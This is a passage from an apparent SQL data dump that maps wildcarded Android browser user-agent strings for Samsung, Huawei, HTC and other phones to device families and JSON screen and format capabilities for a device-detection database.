Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6790) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6790L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6790N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6792L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6810) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6810) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6810B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6810L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6810L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6810M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6810P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6810P) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6812B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6812i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6812i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6818) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7262) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7262) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7270) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7270L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7270L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7272) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7272) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7273T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7275B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7275R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7390) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7390) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7390G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7390G) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7390L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7392) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7392) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7560) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7560) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7560M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7560M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7562) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7562) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7562L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7562L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7562i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7568) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7580) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7580L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7580L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7582) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7582) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7582L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7582L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7583T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7710) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S7710L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Galaxy Nexus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Galaxy Nexus) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Galaxy Nexus) AppleWebKit/* (KHTML, like Gecko; Mediapartners-Google) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Gigaset QV1030) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Google Nexus 4) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Grand X Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; H30-U10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; H30-U10) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; H60-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; H60-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; H60-L12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HIGHWAY 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HIGHWAY PURE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HIGHWAY SIGNS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HIGHWAY STAR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HIMAX POLYMER X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HIMAX POLYMER) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HM 1S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HM NOTE 1LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HM NOTE 1LTEW) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HM NOTE 1S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HM NOTE 1W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HONOR H30-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HS-U688) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HS-U961) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HS-U971) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC 608t) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC 802w) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Butterfly) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 